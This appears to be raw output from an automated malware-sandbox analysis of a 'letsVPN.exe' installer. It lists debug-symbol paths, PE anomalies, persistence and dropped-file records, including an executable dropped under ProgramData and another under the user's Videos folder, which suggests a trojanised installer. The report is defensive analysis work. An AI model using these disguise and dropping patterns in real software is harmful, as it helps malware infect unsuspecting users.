              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000015.00000003.2496112419.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2490972504.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000015.00000003.2475844449.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2407414987.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2383107440.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2428597566.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2453530539.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000015.00000003.2398236397.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2455726262.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2467599603.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000015.00000003.2431492530.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000015.00000003.2423705270.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: System.Web.Services.Description.resources.dll.21.drStatic PE information: 0xC5D8F728 [Sat Mar 9 04:16:40 2075 UTC]
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: nsDialogs.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x11042
              Source: FileSplit.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19e98
              Source: nsExec.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x939f
              Source: System.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x39be
              Source: s.0.drStatic PE information: real checksum: 0x26890d should be: 0x1370ba
              Source: e_sqlite3.dll0.21.drStatic PE information: section name: _RDATA
              Source: WebView2Loader.dll.21.drStatic PE information: section name: .00cfg
              Source: WebView2Loader.dll.21.drStatic PE information: section name: _RDATA
              Source: WebView2Loader.dll0.21.drStatic PE information: section name: .00cfg
              Source: WebView2Loader.dll0.21.drStatic PE information: section name: .voltbl
              Source: ndp462-web.exe.21.drStatic PE information: section name: .boxld01
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00537D65 push ecx; ret 19_2_00537D78
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D08EDC3 push ecx; ret 19_2_6D08EDD6
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0949D7 push ecx; ret 19_2_6D0949EA
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0B7BA8 pushad ; iretd 19_2_6D0B7BB6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBE5E1 pushad ; retf 0007h27_2_00DBE5E2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB97D1 push ss; retf 0007h27_2_00DB97D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBE7D0 pushad ; retf 0007h27_2_00DBE7D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB97F8 push ss; retf 0007h27_2_00DB97FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB8788 push cs; retf 0007h27_2_00DB878A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9781 push ss; retf 0007h27_2_00DB9782
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBE781 pushad ; retf 0007h27_2_00DBE782
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB98C8 push ss; retf 0007h27_2_00DB98CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9849 push ss; retf 0007h27_2_00DB984A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9871 push ss; retf 0007h27_2_00DB9872
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB6820 push eax; ret 27_2_00DB6833
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9820 push ss; retf 0007h27_2_00DB9822
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB99E7 push ss; retf 0007h27_2_00DB99EA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9987 push ss; retf 0007h27_2_00DB998A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DB9A50 push ss; retf 0007h27_2_00DB9A52
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBDBE9 push ebx; retf 0007h27_2_00DBDBEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBDC58 push ebp; retf 0007h27_2_00DBDC5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBDC41 push ebx; retf 0007h27_2_00DBDC42
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBAC61 push ds; retf 0007h27_2_00DBAC62
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBDED7 push esi; retf 0007h27_2_00DBDEDA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00DBDE50 push esi; retf 0007h27_2_00DBDE52
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688835 push ecx; ret 58_2_00688848
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688C76 push ecx; ret 58_2_00688C89
              Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
              Source: msvcr120.dll.19.drStatic PE information: section name: .text entropy: 6.95576372950548
              Source: e_sqlite3.dll.21.drStatic PE information: section name: .text entropy: 7.128615396301837

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Uses cmd line tools excessively to alter registry or file data
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\LetsPRO.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dllJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\base.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\tap0901.sys (copy)Jump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\sJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\Iozvmlb.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dllJump to dropped file
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\SETB4F7.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dllJump to dropped file
